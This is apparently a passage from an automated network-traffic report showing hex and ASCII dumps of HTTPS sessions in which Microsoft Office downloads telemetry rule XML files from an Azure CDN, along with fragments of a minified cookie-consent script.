                                                                                                                                                                      2024-11-21 05:24:01 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                      Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                      2024-11-21 05:24:01 UTC711INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                      Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                      2024-11-21 05:24:01 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f
                                                                                                                                                                      Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-butto
                                                                                                                                                                      2024-11-21 05:24:01 UTC3567INData Raw: 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e
                                                                                                                                                                      Data Ascii: ("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChan


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      108192.168.2.64984113.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:02 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:02 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:02 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1352
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                      ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                      x-ms-request-id: c363d474-d01e-0028-1b8c-3a7896000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052402Z-1777c6cb754j8gqphC1TEB5bf80000000akg00000000a0ht
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:02 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      109192.168.2.64984213.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:02 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:02 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:02 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1405
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                      ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                      x-ms-request-id: 538e08fd-a01e-0032-4b7d-3b1949000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052402Z-1777c6cb754dqf99hC1TEB5nps0000000ae000000000fny8
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:02 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      110192.168.2.64984413.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:02 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:02 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1401
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                      ETag: "0x8DC582BE055B528"
                                                                                                                                                                      x-ms-request-id: 07391f24-a01e-0032-508c-3a1949000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052402Z-178bfbc474bnwsh4hC1NYC2ubs000000015000000000415f
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:02 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      111192.168.2.64984513.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:02 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:02 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:02 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1364
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                      ETag: "0x8DC582BE1223606"
                                                                                                                                                                      x-ms-request-id: fce879e9-f01e-0052-0d66-3b9224000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052402Z-178bfbc474bwlrhlhC1NYCy3kg00000000xg00000000szyy
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:02 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      112192.168.2.64984313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:02 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:02 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1368
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                      ETag: "0x8DC582BDDC22447"
                                                                                                                                                                      x-ms-request-id: 110996dd-801e-0048-7360-3bf3fb000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052402Z-178bfbc474bwh9gmhC1NYCy3rs000000013g000000009ngx
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:02 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      113192.168.2.64985513.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:04 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:04 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:04 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1397
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                      ETag: "0x8DC582BE7262739"
                                                                                                                                                                      x-ms-request-id: d8182971-801e-0067-2581-3bfe30000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052404Z-1777c6cb754gc8g6hC1TEB966c0000000am000000000et2z
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:04 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      114192.168.2.64985613.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:04 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:04 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1360
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                      ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                      x-ms-request-id: b47886c8-201e-00aa-0c8c-3a3928000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052404Z-1777c6cb754j47wfhC1TEB5wrw00000006kg000000001g7u
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:05 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      115192.168.2.64985713.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:04 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:04 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1403
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                      ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                      x-ms-request-id: eb1e057a-b01e-0097-688c-3a4f33000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052404Z-178bfbc474bv7whqhC1NYC1fg400000000x000000000sxux
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
